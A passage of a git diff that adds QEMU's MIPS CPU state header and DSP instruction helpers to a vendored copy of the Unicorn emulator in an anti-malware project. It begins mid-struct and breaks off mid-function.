int32_t CP0_Config1; +#define CP0C1_M 31 +#define CP0C1_MMU 25 +#define CP0C1_IS 22 +#define CP0C1_IL 19 +#define CP0C1_IA 16 +#define CP0C1_DS 13 +#define CP0C1_DL 10 +#define CP0C1_DA 7 +#define CP0C1_C2 6 +#define CP0C1_MD 5 +#define CP0C1_PC 4 +#define CP0C1_WR 3 +#define CP0C1_CA 2 +#define CP0C1_EP 1 +#define CP0C1_FP 0 + int32_t CP0_Config2; +#define CP0C2_M 31 +#define CP0C2_TU 28 +#define CP0C2_TS 24 +#define CP0C2_TL 20 +#define CP0C2_TA 16 +#define CP0C2_SU 12 +#define CP0C2_SS 8 +#define CP0C2_SL 4 +#define CP0C2_SA 0 + int32_t CP0_Config3; +#define CP0C3_M 31 +#define CP0C3_BPG 30 +#define CP0C3_CMCGR 29 +#define CP0C3_MSAP 28 +#define CP0C3_BP 27 +#define CP0C3_BI 26 +#define CP0C3_IPLW 21 +#define CP0C3_MMAR 18 +#define CP0C3_MCU 17 +#define CP0C3_ISA_ON_EXC 16 +#define CP0C3_ISA 14 +#define CP0C3_ULRI 13 +#define CP0C3_RXI 12 +#define CP0C3_DSP2P 11 +#define CP0C3_DSPP 10 +#define CP0C3_LPA 7 +#define CP0C3_VEIC 6 +#define CP0C3_VInt 5 +#define CP0C3_SP 4 +#define CP0C3_CDMM 3 +#define CP0C3_MT 2 +#define CP0C3_SM 1 +#define CP0C3_TL 0 + uint32_t CP0_Config4; + uint32_t CP0_Config4_rw_bitmask; +#define CP0C4_M 31 +#define CP0C4_IE 29 +#define CP0C4_KScrExist 16 +#define CP0C4_MMUExtDef 14 +#define CP0C4_FTLBPageSize 8 +#define CP0C4_FTLBWays 4 +#define CP0C4_FTLBSets 0 +#define CP0C4_MMUSizeExt 0 + uint32_t CP0_Config5; + uint32_t CP0_Config5_rw_bitmask; +#define CP0C5_M 31 +#define CP0C5_K 30 +#define CP0C5_CV 29 +#define CP0C5_EVA 28 +#define CP0C5_MSAEn 27 +#define CP0C5_SBRI 6 +#define CP0C5_UFR 2 +#define CP0C5_NFExists 0 + int32_t CP0_Config6; + int32_t CP0_Config7; + /* XXX: Maybe make LLAddr per-TC? 
*/ + target_ulong lladdr; + target_ulong llval; + target_ulong llnewval; + target_ulong llreg; + target_ulong CP0_LLAddr_rw_bitmask; + int CP0_LLAddr_shift; + target_ulong CP0_WatchLo[8]; + int32_t CP0_WatchHi[8]; + target_ulong CP0_XContext; + int32_t CP0_Framemask; + int32_t CP0_Debug; +#define CP0DB_DBD 31 +#define CP0DB_DM 30 +#define CP0DB_LSNM 28 +#define CP0DB_Doze 27 +#define CP0DB_Halt 26 +#define CP0DB_CNT 25 +#define CP0DB_IBEP 24 +#define CP0DB_DBEP 21 +#define CP0DB_IEXI 20 +#define CP0DB_VER 15 +#define CP0DB_DEC 10 +#define CP0DB_SSt 8 +#define CP0DB_DINT 5 +#define CP0DB_DIB 4 +#define CP0DB_DDBS 3 +#define CP0DB_DDBL 2 +#define CP0DB_DBp 1 +#define CP0DB_DSS 0 + target_ulong CP0_DEPC; + int32_t CP0_Performance0; + int32_t CP0_TagLo; + int32_t CP0_DataLo; + int32_t CP0_TagHi; + int32_t CP0_DataHi; + target_ulong CP0_ErrorEPC; + int32_t CP0_DESAVE; + /* We waste some space so we can handle shadow registers like TCs. */ + TCState tcs[MIPS_SHADOW_SET_MAX]; + CPUMIPSFPUContext fpus[MIPS_FPU_MAX]; + /* QEMU */ + int error_code; +#define EXCP_TLB_NOMATCH 0x1 +#define EXCP_INST_NOTAVAIL 0x2 /* No valid instruction word for BadInstr */ + uint32_t hflags; /* CPU State */ + /* TMASK defines different execution modes */ +#define MIPS_HFLAG_TMASK 0x15807FF +#define MIPS_HFLAG_MODE 0x00007 /* execution modes */ + /* The KSU flags must be the lowest bits in hflags. The flag order + must be the same as defined for CP0 Status. This allows to use + the bits as the value of mmu_idx. 
*/ +#define MIPS_HFLAG_KSU 0x00003 /* kernel/supervisor/user mode mask */ +#define MIPS_HFLAG_UM 0x00002 /* user mode flag */ +#define MIPS_HFLAG_SM 0x00001 /* supervisor mode flag */ +#define MIPS_HFLAG_KM 0x00000 /* kernel mode flag */ +#define MIPS_HFLAG_DM 0x00004 /* Debug mode */ +#define MIPS_HFLAG_64 0x00008 /* 64-bit instructions enabled */ +#define MIPS_HFLAG_CP0 0x00010 /* CP0 enabled */ +#define MIPS_HFLAG_FPU 0x00020 /* FPU enabled */ +#define MIPS_HFLAG_F64 0x00040 /* 64-bit FPU enabled */ + /* True if the MIPS IV COP1X instructions can be used. This also + controls the non-COP1X instructions RECIP.S, RECIP.D, RSQRT.S + and RSQRT.D. */ +#define MIPS_HFLAG_COP1X 0x00080 /* COP1X instructions enabled */ +#define MIPS_HFLAG_RE 0x00100 /* Reversed endianness */ +#define MIPS_HFLAG_AWRAP 0x00200 /* 32-bit compatibility address wrapping */ +#define MIPS_HFLAG_M16 0x00400 /* MIPS16 mode flag */ +#define MIPS_HFLAG_M16_SHIFT 10 + /* If translation is interrupted between the branch instruction and + * the delay slot, record what type of branch it is so that we can + * resume translation properly. It might be possible to reduce + * this from three bits to two. */ +#define MIPS_HFLAG_BMASK_BASE 0x803800 +#define MIPS_HFLAG_B 0x00800 /* Unconditional branch */ +#define MIPS_HFLAG_BC 0x01000 /* Conditional branch */ +#define MIPS_HFLAG_BL 0x01800 /* Likely branch */ +#define MIPS_HFLAG_BR 0x02000 /* branch to register (can't link TB) */ + /* Extra flags about the current pending branch. 
*/ +#define MIPS_HFLAG_BMASK_EXT 0x7C000 +#define MIPS_HFLAG_B16 0x04000 /* branch instruction was 16 bits */ +#define MIPS_HFLAG_BDS16 0x08000 /* branch requires 16-bit delay slot */ +#define MIPS_HFLAG_BDS32 0x10000 /* branch requires 32-bit delay slot */ +#define MIPS_HFLAG_BDS_STRICT 0x20000 /* Strict delay slot size */ +#define MIPS_HFLAG_BX 0x40000 /* branch exchanges execution mode */ +#define MIPS_HFLAG_BMASK (MIPS_HFLAG_BMASK_BASE | MIPS_HFLAG_BMASK_EXT) + /* MIPS DSP resources access. */ +#define MIPS_HFLAG_DSP 0x080000 /* Enable access to MIPS DSP resources. */ +#define MIPS_HFLAG_DSPR2 0x100000 /* Enable access to MIPS DSPR2 resources. */ + /* Extra flag about HWREna register. */ +#define MIPS_HFLAG_HWRENA_ULR 0x200000 /* ULR bit from HWREna is set. */ +#define MIPS_HFLAG_SBRI 0x400000 /* R6 SDBBP causes RI excpt. in user mode */ +#define MIPS_HFLAG_FBNSLOT 0x800000 /* Forbidden slot */ +#define MIPS_HFLAG_MSA 0x1000000 + target_ulong btarget; /* Jump / branch target */ + target_ulong bcond; /* Branch condition (if needed) */ + + int SYNCI_Step; /* Address step size for SYNCI */ + int CCRes; /* Cycle count resolution/divisor */ + uint32_t CP0_Status_rw_bitmask; /* Read/write bits in CP0_Status */ + uint32_t CP0_TCStatus_rw_bitmask; /* Read/write bits in CP0_TCStatus */ + int insn_flags; /* Supported instruction set */ + + CPU_COMMON + + /* Fields from here on are preserved across CPU reset. 
*/ + CPUMIPSMVPContext *mvp; +#if !defined(CONFIG_USER_ONLY) + CPUMIPSTLBContext *tlb; +#endif + + const mips_def_t *cpu_model; + //void *irq[8]; + //QEMUTimer *timer; /* Internal timer */ + + // Unicorn engine + struct uc_struct *uc; +}; + +#include "cpu-qom.h" + +#if !defined(CONFIG_USER_ONLY) +int no_mmu_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type); +int fixed_mmu_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type); +int r4k_map_address (CPUMIPSState *env, hwaddr *physical, int *prot, + target_ulong address, int rw, int access_type); +void r4k_helper_tlbwi(CPUMIPSState *env); +void r4k_helper_tlbwr(CPUMIPSState *env); +void r4k_helper_tlbp(CPUMIPSState *env); +void r4k_helper_tlbr(CPUMIPSState *env); +void r4k_helper_tlbinv(CPUMIPSState *env); +void r4k_helper_tlbinvf(CPUMIPSState *env); + +void mips_cpu_unassigned_access(CPUState *cpu, hwaddr addr, + bool is_write, bool is_exec, int unused, + unsigned size); +#endif + +void mips_cpu_list (FILE *f, fprintf_function cpu_fprintf); + +#define cpu_exec cpu_mips_exec +#define cpu_gen_code cpu_mips_gen_code +#define cpu_signal_handler cpu_mips_signal_handler +#define cpu_list mips_cpu_list + +extern void cpu_wrdsp(uint32_t rs, uint32_t mask_num, CPUMIPSState *env); +extern uint32_t cpu_rddsp(uint32_t mask_num, CPUMIPSState *env); + +#define CPU_SAVE_VERSION 5 + +/* MMU modes definitions. We carefully match the indices with our + hflags layout. 
*/ +#define MMU_MODE0_SUFFIX _kernel +#define MMU_MODE1_SUFFIX _super +#define MMU_MODE2_SUFFIX _user +#define MMU_USER_IDX 2 +static inline int cpu_mmu_index (CPUMIPSState *env) +{ + return env->hflags & MIPS_HFLAG_KSU; +} + +static inline int cpu_mips_hw_interrupts_pending(CPUMIPSState *env) +{ + int32_t pending; + int32_t status; + int r; + + if (!(env->CP0_Status & (1 << CP0St_IE)) || + (env->CP0_Status & (1 << CP0St_EXL)) || + (env->CP0_Status & (1 << CP0St_ERL)) || + /* Note that the TCStatus IXMT field is initialized to zero, + and only MT capable cores can set it to one. So we don't + need to check for MT capabilities here. */ + (env->active_tc.CP0_TCStatus & (1 << CP0TCSt_IXMT)) || + (env->hflags & MIPS_HFLAG_DM)) { + /* Interrupts are disabled */ + return 0; + } + + pending = env->CP0_Cause & CP0Ca_IP_mask; + status = env->CP0_Status & CP0Ca_IP_mask; + + if (env->CP0_Config3 & (1 << CP0C3_VEIC)) { + /* A MIPS configured with a vectorizing external interrupt controller + will feed a vector into the Cause pending lines. The core treats + the status lines as a vector level, not as indiviual masks. */ + r = pending > status; + } else { + /* A MIPS configured with compatibility or VInt (Vectored Interrupts) + treats the pending lines as individual interrupt lines, the status + lines are individual masks. */ + r = pending & status; + } + return r; +} + +#include "exec/cpu-all.h" + +/* Memory access type : + * may be needed for precise access rights control and precise exceptions. 
+ */ +enum { + /* 1 bit to define user level / supervisor access */ + ACCESS_USER = 0x00, + ACCESS_SUPER = 0x01, + /* 1 bit to indicate direction */ + ACCESS_STORE = 0x02, + /* Type of instruction that generated the access */ + ACCESS_CODE = 0x10, /* Code fetch access */ + ACCESS_INT = 0x20, /* Integer load/store access */ + ACCESS_FLOAT = 0x30, /* floating point load/store access */ +}; + +/* Exceptions */ +enum { + EXCP_NONE = -1, + EXCP_RESET = 0, + EXCP_SRESET, + EXCP_DSS, + EXCP_DINT, + EXCP_DDBL, + EXCP_DDBS, + EXCP_NMI, + EXCP_MCHECK, + EXCP_EXT_INTERRUPT, /* 8 */ + EXCP_DFWATCH, + EXCP_DIB, + EXCP_IWATCH, + EXCP_AdEL, + EXCP_AdES, + EXCP_TLBF, + EXCP_IBE, + EXCP_DBp, /* 16 */ + EXCP_SYSCALL, + EXCP_BREAK, + EXCP_CpU, + EXCP_RI, + EXCP_OVERFLOW, + EXCP_TRAP, + EXCP_FPE, + EXCP_DWATCH, /* 24 */ + EXCP_LTLBL, + EXCP_TLBL, + EXCP_TLBS, + EXCP_DBE, + EXCP_THREAD, + EXCP_MDMX, + EXCP_C2E, + EXCP_CACHE, /* 32 */ + EXCP_DSPDIS, + EXCP_MSADIS, + EXCP_MSAFPE, + EXCP_TLBXI, + EXCP_TLBRI, + + EXCP_LAST = EXCP_TLBRI, +}; +/* Dummy exception for conditional stores. */ +#define EXCP_SC 0x100 + +/* + * This is an interrnally generated WAKE request line. + * It is driven by the CPU itself. Raised when the MT + * block wants to wake a VPE from an inactive state and + * cleared when VPE goes from active to inactive. 
+ */ +#define CPU_INTERRUPT_WAKE CPU_INTERRUPT_TGT_INT_0 + +int cpu_mips_exec(struct uc_struct *uc, CPUMIPSState *s); +void mips_tcg_init(struct uc_struct *uc); +MIPSCPU *cpu_mips_init(struct uc_struct *uc, const char *cpu_model); +int cpu_mips_signal_handler(int host_signum, void *pinfo, void *puc); + +/* TODO QOM'ify CPU reset and remove */ +void cpu_state_reset(CPUMIPSState *s); + +/* mips_timer.c */ +uint32_t cpu_mips_get_random (CPUMIPSState *env); +uint32_t cpu_mips_get_count (CPUMIPSState *env); +void cpu_mips_store_count (CPUMIPSState *env, uint32_t value); +void cpu_mips_store_compare (CPUMIPSState *env, uint32_t value); +void cpu_mips_start_count(CPUMIPSState *env); +void cpu_mips_stop_count(CPUMIPSState *env); + +/* mips_int.c */ +void cpu_mips_soft_irq(CPUMIPSState *env, int irq, int level); + +/* helper.c */ +int mips_cpu_handle_mmu_fault(CPUState *cpu, vaddr address, int rw, + int mmu_idx); +#if !defined(CONFIG_USER_ONLY) +void r4k_invalidate_tlb (CPUMIPSState *env, int idx, int use_extra); +hwaddr cpu_mips_translate_address (CPUMIPSState *env, target_ulong address, + int rw); +#endif +target_ulong exception_resume_pc (CPUMIPSState *env); + +/* op_helper.c */ +extern unsigned int ieee_rm[]; +int ieee_ex_to_mips(int xcpt); + +static inline void cpu_get_tb_cpu_state(CPUMIPSState *env, target_ulong *pc, + target_ulong *cs_base, int *flags) +{ + *pc = env->active_tc.PC; + *cs_base = 0; + *flags = env->hflags & (MIPS_HFLAG_TMASK | MIPS_HFLAG_BMASK | + MIPS_HFLAG_HWRENA_ULR); +} + +static inline int mips_vpe_active(CPUMIPSState *env) +{ + int active = 1; + + /* Check that the VPE is enabled. */ + if (!(env->mvp->CP0_MVPControl & (1 << CP0MVPCo_EVP))) { + active = 0; + } + /* Check that the VPE is activated. */ + if (!(env->CP0_VPEConf0 & (1 << CP0VPEC0_VPA))) { + active = 0; + } + + /* Now verify that there are active thread contexts in the VPE. + + This assumes the CPU model will internally reschedule threads + if the active one goes to sleep. 
If there are no threads available + the active one will be in a sleeping state, and we can turn off + the entire VPE. */ + if (!(env->active_tc.CP0_TCStatus & (1 << CP0TCSt_A))) { + /* TC is not activated. */ + active = 0; + } + if (env->active_tc.CP0_TCHalt & 1) { + /* TC is in halt state. */ + active = 0; + } + + return active; +} + +#include "exec/exec-all.h" + +static inline void compute_hflags(CPUMIPSState *env) +{ + env->hflags &= ~(MIPS_HFLAG_COP1X | MIPS_HFLAG_64 | MIPS_HFLAG_CP0 | + MIPS_HFLAG_F64 | MIPS_HFLAG_FPU | MIPS_HFLAG_KSU | + MIPS_HFLAG_AWRAP | MIPS_HFLAG_DSP | MIPS_HFLAG_DSPR2 | + MIPS_HFLAG_SBRI | MIPS_HFLAG_MSA); + if (!(env->CP0_Status & (1 << CP0St_EXL)) && + !(env->CP0_Status & (1 << CP0St_ERL)) && + !(env->hflags & MIPS_HFLAG_DM)) { + env->hflags |= (env->CP0_Status >> CP0St_KSU) & MIPS_HFLAG_KSU; + } +#if defined(TARGET_MIPS64) + if (((env->hflags & MIPS_HFLAG_KSU) != MIPS_HFLAG_UM) || + (env->CP0_Status & (1 << CP0St_PX)) || + (env->CP0_Status & (1 << CP0St_UX))) { + env->hflags |= MIPS_HFLAG_64; + } + + if (((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_UM) && + !(env->CP0_Status & (1 << CP0St_UX))) { + env->hflags |= MIPS_HFLAG_AWRAP; + } else if (env->insn_flags & ISA_MIPS32R6) { + /* Address wrapping for Supervisor and Kernel is specified in R6 */ + if ((((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_SM) && + !(env->CP0_Status & (1 << CP0St_SX))) || + (((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_KM) && + !(env->CP0_Status & (1 << CP0St_KX)))) { + env->hflags |= MIPS_HFLAG_AWRAP; + } + } +#endif + if (((env->CP0_Status & (1 << CP0St_CU0)) && + !(env->insn_flags & ISA_MIPS32R6)) || + !(env->hflags & MIPS_HFLAG_KSU)) { + env->hflags |= MIPS_HFLAG_CP0; + } + if (env->CP0_Status & (1 << CP0St_CU1)) { + env->hflags |= MIPS_HFLAG_FPU; + } + if (env->CP0_Status & (1 << CP0St_FR)) { + env->hflags |= MIPS_HFLAG_F64; + } + if (((env->hflags & MIPS_HFLAG_KSU) != MIPS_HFLAG_KM) && + (env->CP0_Config5 & (1 << CP0C5_SBRI))) { + env->hflags |= 
MIPS_HFLAG_SBRI; + } + if (env->insn_flags & ASE_DSPR2) { + /* Enables access MIPS DSP resources, now our cpu is DSP ASER2, + so enable to access DSPR2 resources. */ + if (env->CP0_Status & (1 << CP0St_MX)) { + env->hflags |= MIPS_HFLAG_DSP | MIPS_HFLAG_DSPR2; + } + + } else if (env->insn_flags & ASE_DSP) { + /* Enables access MIPS DSP resources, now our cpu is DSP ASE, + so enable to access DSP resources. */ + if (env->CP0_Status & (1 << CP0St_MX)) { + env->hflags |= MIPS_HFLAG_DSP; + } + + } + if (env->insn_flags & ISA_MIPS32R2) { + if (env->active_fpu.fcr0 & (1 << FCR0_F64)) { + env->hflags |= MIPS_HFLAG_COP1X; + } + } else if (env->insn_flags & ISA_MIPS32) { + if (env->hflags & MIPS_HFLAG_64) { + env->hflags |= MIPS_HFLAG_COP1X; + } + } else if (env->insn_flags & ISA_MIPS4) { + /* All supported MIPS IV CPUs use the XX (CU3) to enable + and disable the MIPS IV extensions to the MIPS III ISA. + Some other MIPS IV CPUs ignore the bit, so the check here + would be too restrictive for them. */ + if (env->CP0_Status & (1U << CP0St_CU3)) { + env->hflags |= MIPS_HFLAG_COP1X; + } + } + if (env->insn_flags & ASE_MSA) { + if (env->CP0_Config5 & (1 << CP0C5_MSAEn)) { + env->hflags |= MIPS_HFLAG_MSA; + } + } +} + +#endif /* !defined (__MIPS_CPU_H__) */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/dsp_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/dsp_helper.c new file mode 100644 index 0000000..46528de --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/dsp_helper.c @@ -0,0 +1,3761 @@ +/* + * MIPS ASE DSP Instruction emulation helpers for QEMU. + * + * Copyright (c) 2012 Jia Liu + * Dongxue Zhang + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. 
+ * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" +#include "qemu/bitops.h" + +/* As the byte ordering doesn't matter, i.e. all columns are treated + identically, these unions can be used directly. */ +typedef union { + uint8_t ub[4]; + int8_t sb[4]; + uint16_t uh[2]; + int16_t sh[2]; + uint32_t uw[1]; + int32_t sw[1]; +} DSP32Value; + +typedef union { + uint8_t ub[8]; + int8_t sb[8]; + uint16_t uh[4]; + int16_t sh[4]; + uint32_t uw[2]; + int32_t sw[2]; + uint64_t ul[1]; + int64_t sl[1]; +} DSP64Value; + +/*** MIPS DSP internal functions begin ***/ +#define MIPSDSP_ABS(x) (((x) >= 0) ? x : -x) +#define MIPSDSP_OVERFLOW_ADD(a, b, c, d) (~(a ^ b) & (a ^ c) & d) +#define MIPSDSP_OVERFLOW_SUB(a, b, c, d) ((a ^ b) & (a ^ c) & d) + +static inline void set_DSPControl_overflow_flag(uint32_t flag, int position, + CPUMIPSState *env) +{ + env->active_tc.DSPControl |= (target_ulong)flag << position; +} + +static inline void set_DSPControl_carryflag(bool flag, CPUMIPSState *env) +{ + env->active_tc.DSPControl &= ~(1 << 13); + env->active_tc.DSPControl |= flag << 13; +} + +static inline uint32_t get_DSPControl_carryflag(CPUMIPSState *env) +{ + return (env->active_tc.DSPControl >> 13) & 0x01; +} + +static inline void set_DSPControl_24(uint32_t flag, int len, CPUMIPSState *env) +{ + uint32_t filter; + + filter = ((0x01 << len) - 1) << 24; + filter = ~filter; + + env->active_tc.DSPControl &= filter; + env->active_tc.DSPControl |= (target_ulong)flag << 24; +} + +static inline void set_DSPControl_pos(uint32_t pos, CPUMIPSState *env) +{ + target_ulong dspc; + + dspc = env->active_tc.DSPControl; 
+#ifndef TARGET_MIPS64 + dspc = dspc & 0xFFFFFFC0; + dspc |= (pos & 0x3F); +#else + dspc = dspc & 0xFFFFFF80; + dspc |= (pos & 0x7F); +#endif + env->active_tc.DSPControl = dspc; +} + +static inline uint32_t get_DSPControl_pos(CPUMIPSState *env) +{ + target_ulong dspc; + uint32_t pos; + + dspc = env->active_tc.DSPControl; + +#ifndef TARGET_MIPS64 + pos = dspc & 0x3F; +#else + pos = dspc & 0x7F; +#endif + + return pos; +} + +static inline void set_DSPControl_efi(uint32_t flag, CPUMIPSState *env) +{ + env->active_tc.DSPControl &= 0xFFFFBFFF; + env->active_tc.DSPControl |= (target_ulong)flag << 14; +} + +#define DO_MIPS_SAT_ABS(size) \ +static inline int##size##_t mipsdsp_sat_abs##size(int##size##_t a, \ + CPUMIPSState *env) \ +{ \ + if (a == INT##size##_MIN) { \ + set_DSPControl_overflow_flag(1, 20, env); \ + return INT##size##_MAX; \ + } else { \ + return MIPSDSP_ABS(a); \ + } \ +} +DO_MIPS_SAT_ABS(8) +DO_MIPS_SAT_ABS(16) +DO_MIPS_SAT_ABS(32) +#undef DO_MIPS_SAT_ABS + +/* get sum value */ +static inline int16_t mipsdsp_add_i16(int16_t a, int16_t b, CPUMIPSState *env) +{ + int16_t tempI; + + tempI = a + b; + + if (MIPSDSP_OVERFLOW_ADD(a, b, tempI, 0x8000)) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return tempI; +} + +static inline int16_t mipsdsp_sat_add_i16(int16_t a, int16_t b, + CPUMIPSState *env) +{ + int16_t tempS; + + tempS = a + b; + + if (MIPSDSP_OVERFLOW_ADD(a, b, tempS, 0x8000)) { + if (a > 0) { + tempS = 0x7FFF; + } else { + tempS = 0x8000; + } + set_DSPControl_overflow_flag(1, 20, env); + } + + return tempS; +} + +static inline int32_t mipsdsp_sat_add_i32(int32_t a, int32_t b, + CPUMIPSState *env) +{ + int32_t tempI; + + tempI = a + b; + + if (MIPSDSP_OVERFLOW_ADD(a, b, tempI, 0x80000000)) { + if (a > 0) { + tempI = 0x7FFFFFFF; + } else { + tempI = 0x80000000; + } + set_DSPControl_overflow_flag(1, 20, env); + } + + return tempI; +} + +static inline uint8_t mipsdsp_add_u8(uint8_t a, uint8_t b, CPUMIPSState *env) +{ + uint16_t temp; + + temp = 
(uint16_t)a + (uint16_t)b; + + if (temp & 0x0100) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0xFF; +} + +static inline uint16_t mipsdsp_add_u16(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + uint32_t temp; + + temp = (uint32_t)a + (uint32_t)b; + + if (temp & 0x00010000) { + set_DSPControl_overflow_flag(1, 20, env); + } + + return temp & 0xFFFF; +} + +static inline uint8_t mipsdsp_sat_add_u8(uint8_t a, uint8_t b, + CPUMIPSState *env) +{ + uint8_t result; + uint16_t temp; + + temp = (uint16_t)a + (uint16_t)b; + result = temp & 0xFF; + + if (0x0100 & temp) { + result = 0xFF; + set_DSPControl_overflow_flag(1, 20, env); + } + + return result; +} + +static inline uint16_t mipsdsp_sat_add_u16(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + uint16_t result; + uint32_t temp; + + temp = (uint32_t)a + (uint32_t)b; + result = temp & 0xFFFF; + + if (0x00010000 & temp) { + result = 0xFFFF; + set_DSPControl_overflow_flag(1, 20, env); + } + + return result; +} + +static inline int32_t mipsdsp_sat32_acc_q31(int32_t acc, int32_t a, + CPUMIPSState *env) +{ + int64_t temp; + int32_t temp32, temp31, result; + int64_t temp_sum; + +#ifndef TARGET_MIPS64 + temp = ((uint64_t)env->active_tc.HI[acc] << 32) | + (uint64_t)env->active_tc.LO[acc]; +#else + temp = (uint64_t)env->active_tc.LO[acc]; +#endif + + temp_sum = (int64_t)a + temp; + + temp32 = (temp_sum >> 32) & 0x01; + temp31 = (temp_sum >> 31) & 0x01; + result = temp_sum & 0xFFFFFFFF; + + if (temp32 != temp31) { + if (temp32 == 0) { + result = 0x7FFFFFFF; + } else { + result = 0x80000000; + } + set_DSPControl_overflow_flag(1, 16 + acc, env); + } + + return result; +} + +#ifdef TARGET_MIPS64 +/* a[0] is LO, a[1] is HI. 
*/ +static inline void mipsdsp_sat64_acc_add_q63(int64_t *ret, + int32_t ac, + int64_t *a, + CPUMIPSState *env) +{ + bool temp64; + + ret[0] = env->active_tc.LO[ac] + a[0]; + ret[1] = env->active_tc.HI[ac] + a[1]; + + if (((uint64_t)ret[0] < (uint64_t)env->active_tc.LO[ac]) && + ((uint64_t)ret[0] < (uint64_t)a[0])) { + ret[1] += 1; + } + temp64 = ret[1] & 1; + if (temp64 != ((ret[0] >> 63) & 0x01)) { + if (temp64) { + ret[0] = (0x01ull << 63); + ret[1] = ~0ull; + } else { + ret[0] = (0x01ull << 63) - 1; + ret[1] = 0x00; + } + set_DSPControl_overflow_flag(1, 16 + ac, env); + } +} + +static inline void mipsdsp_sat64_acc_sub_q63(int64_t *ret, + int32_t ac, + int64_t *a, + CPUMIPSState *env) +{ + bool temp64; + + ret[0] = env->active_tc.LO[ac] - a[0]; + ret[1] = env->active_tc.HI[ac] - a[1]; + + if ((uint64_t)ret[0] > (uint64_t)env->active_tc.LO[ac]) { + ret[1] -= 1; + } + temp64 = ret[1] & 1; + if (temp64 != ((ret[0] >> 63) & 0x01)) { + if (temp64) { + ret[0] = (0x01ull << 63); + ret[1] = ~0ull; + } else { + ret[0] = (0x01ull << 63) - 1; + ret[1] = 0x00; + } + set_DSPControl_overflow_flag(1, 16 + ac, env); + } +} +#endif + +static inline int32_t mipsdsp_mul_i16_i16(int16_t a, int16_t b, + CPUMIPSState *env) +{ + int32_t temp; + + temp = (int32_t)a * (int32_t)b; + + if ((temp > (int)0x7FFF) || (temp < (int)0xFFFF8000)) { + set_DSPControl_overflow_flag(1, 21, env); + } + temp &= 0x0000FFFF; + + return temp; +} + +static inline int32_t mipsdsp_mul_u16_u16(int32_t a, int32_t b) +{ + return a * b; +} + +#ifdef TARGET_MIPS64 +static inline int32_t mipsdsp_mul_i32_i32(int32_t a, int32_t b) +{ + return a * b; +} +#endif + +static inline int32_t mipsdsp_sat16_mul_i16_i16(int16_t a, int16_t b, + CPUMIPSState *env) +{ + int32_t temp; + + temp = (int32_t)a * (int32_t)b; + + if (temp > (int)0x7FFF) { + temp = 0x00007FFF; + set_DSPControl_overflow_flag(1, 21, env); + } else if (temp < (int)0xffff8000) { + temp = 0xFFFF8000; + set_DSPControl_overflow_flag(1, 21, env); + } + temp &= 
0x0000FFFF; + + return temp; +} + +static inline int32_t mipsdsp_mul_q15_q15_overflowflag21(uint16_t a, uint16_t b, + CPUMIPSState *env) +{ + int32_t temp; + + if ((a == 0x8000) && (b == 0x8000)) { + temp = 0x7FFFFFFF; + set_DSPControl_overflow_flag(1, 21, env); + } else { + temp = ((int16_t)a * (int16_t)b) << 1; + } + + return temp; +} + +/* right shift */ +static inline uint8_t mipsdsp_rshift_u8(uint8_t a, target_ulong mov) +{ + return a >> mov; +} + +static inline uint16_t mipsdsp_rshift_u16(uint16_t a, target_ulong mov) +{ + return a >> mov; +} + +static inline int8_t mipsdsp_rashift8(int8_t a, target_ulong mov) +{ + return a >> mov; +} + +static inline int16_t mipsdsp_rashift16(int16_t a, target_ulong mov) +{ + return a >> mov; +} + +#ifdef TARGET_MIPS64 +static inline int32_t mipsdsp_rashift32(int32_t a, target_ulong mov) +{ + return a >> mov; +} +#endif + +static inline int16_t mipsdsp_rshift1_add_q16(int16_t a, int16_t b) +{ + int32_t temp; + + temp = (int32_t)a + (int32_t)b; + + return (temp >> 1) & 0xFFFF; +} + +/* round right shift */ +static inline int16_t mipsdsp_rrshift1_add_q16(int16_t a, int16_t b) +{ + int32_t temp; + + temp = (int32_t)a + (int32_t)b; + temp += 1; + + return (temp >> 1) & 0xFFFF; +} + +static inline int32_t mipsdsp_rshift1_add_q32(int32_t a, int32_t b) +{ + int64_t temp; + + temp = (int64_t)a + (int64_t)b; + + return (temp >> 1) & 0xFFFFFFFF; +} + +static inline int32_t mipsdsp_rrshift1_add_q32(int32_t a, int32_t b) +{ + int64_t temp; + + temp = (int64_t)a + (int64_t)b; + temp += 1; + + return (temp >> 1) & 0xFFFFFFFF; +} + +static inline uint8_t mipsdsp_rshift1_add_u8(uint8_t a, uint8_t b) +{ + uint16_t temp; + + temp = (uint16_t)a + (uint16_t)b; + + return (temp >> 1) & 0x00FF; +} + +static inline uint8_t mipsdsp_rrshift1_add_u8(uint8_t a, uint8_t b) +{ + uint16_t temp; + + temp = (uint16_t)a + (uint16_t)b + 1; + + return (temp >> 1) & 0x00FF; +} + +#ifdef TARGET_MIPS64 +static inline uint8_t mipsdsp_rshift1_sub_u8(uint8_t a, 
